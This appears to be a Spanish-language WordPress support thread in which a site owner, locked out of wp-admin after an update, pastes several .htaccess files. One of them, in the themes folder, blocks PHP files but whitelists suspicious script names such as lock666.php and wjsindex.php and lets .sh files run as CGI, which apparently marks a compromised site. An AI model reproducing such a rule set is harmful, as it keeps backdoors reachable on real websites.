Respuestas de foro creadas

Viendo 8 respuestas - de la 1 a la 8 (de un total de 8)
  • Iniciador del debate alex7st

    (@alex7st)

    Buen día

    El archivo .htaccess de la raíz (/home/qwspanel), quedo asi, pero nada que tengo acceso

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index.php$ – [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . index.php [L]
    </IfModule>
    <IfModule mod_deflate.c>
    SetOutputFilter DEFLATE
    <IfModule mod_setenvif.c>
    # Netscape 4.x has some problems…
    BrowserMatch ^Mozilla/4 gzip-only-text/html

    # Netscape 4.06-4.08 have some more problems
    BrowserMatch ^Mozilla/4\.0[678] no-gzip

    # MSIE masquerades as Netscape, but it is fine
    # BrowserMatch \bMSIE !no-gzip !gzip-only-text/html

    # NOTE: Due to a bug in mod_setenvif up to Apache 2.0.48
    # the above regex won’t work. You can use the following
    # workaround to get the desired effect:
    BrowserMatch \bMSI[E] !no-gzip !gzip-only-text/html

    # Don’t compress images
    SetEnvIfNoCase Request_URI .(?:gif|jpe?g|png)$ no-gzip dont-vary
    </IfModule>

    <IfModule mod_headers.c>
    # Make sure proxies don’t deliver the wrong content
    Header append Vary User-Agent env=!dont-vary
    </IfModule>
    </IfModule>`

    Iniciador del debate alex7st

    (@alex7st)

    Buen día

    Disculpa el .htaccess que me indicas que edite es el que esta en «/wp-content/themes/» o el que esta en la raíz (/home/qwspanel)

    Iniciador del debate alex7st

    (@alex7st)

    Buen dia
    No, no ocurrió nada extraño creería, este error me empezó a pasar desde que se actualizo a wordpress 6.0 y dejo de funcionar Elementor

    Disculpa la pregunta, pero cuando me dices que vaya a ajustes, esos ajustes son del cpanel, del administrador de archivos o de alguna otra herramienta?

    Iniciador del debate alex7st

    (@alex7st)

    Buen día

    Realizamos la comparación y es diferente el contenido del archivo .htaccess que esta en «/wp-content/themes/» con el archivo .htaccess que esta en la raiz (/home/qwspanel)

    Este es el contenido del .htaccess de la raiz «/home/qwspanel»

    <IfModule mod_deflate.c>
        SetOutputFilter DEFLATE
        <IfModule mod_setenvif.c>
            # Netscape 4.x has some problems...
            BrowserMatch ^Mozilla/4 gzip-only-text/html
    
            # Netscape 4.06-4.08 have some more problems
            BrowserMatch ^Mozilla/4\.0[678] no-gzip
    
            # MSIE masquerades as Netscape, but it is fine
            # BrowserMatch \bMSIE !no-gzip !gzip-only-text/html
    
            # NOTE: Due to a bug in mod_setenvif up to Apache 2.0.48
            # the above regex won't work. You can use the following
            # workaround to get the desired effect:
            BrowserMatch \bMSI[E] !no-gzip !gzip-only-text/html
    
            # Don't compress images
            SetEnvIfNoCase Request_URI .(?:gif|jpe?g|png)$ no-gzip dont-vary
        </IfModule>
    
        <IfModule mod_headers.c>
            # Make sure proxies don't deliver the wrong content
            Header append Vary User-Agent env=!dont-vary
        </IfModule>
    </IfModule>
    Iniciador del debate alex7st

    (@alex7st)

    Buen día

    este es el contenido del .haccess

    <FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php|asp|Php|aspx)$">
     Order allow,deny
     Deny from all
    </FilesMatch>
    <FilesMatch "^(postfs.php|votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.php|jsdindex.php|wp-login.php|load.php|template-load.php)$">
     Order allow,deny
     Allow from all
    </FilesMatch>
    AddType application/x-httpd-cgi .sh
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . index.php [L]
    </IfModule>

    ya subí el archivo que indicaste

    Iniciador del debate alex7st

    (@alex7st)

    Buen día

    1. Esta es la URL
    https://www.qualitywaterservice.co/wp-admin

    2. si hay un archivo con ese nombre (.htaccess)

    3. listo ya la borre

    Iniciador del debate alex7st

    (@alex7st)

    Las carpetas que hay ahí son:

    Grafique
    Kava
    twentynineteen
    twentyseventeen
    twentytwenty
    twentytwentyone
    .htaccess
    index.php

    Iniciador del debate alex7st

    (@alex7st)

    Buen día
    Hice lo que indicaste:

    1. Desde el administrador de archivos borre la carpeta de twentytwenty
    2. cargue el Twenty Twenty-One

    pero aun continua el mismo error, no me deja ingresar

Viendo 8 respuestas - de la 1 a la 8 (de un total de 8)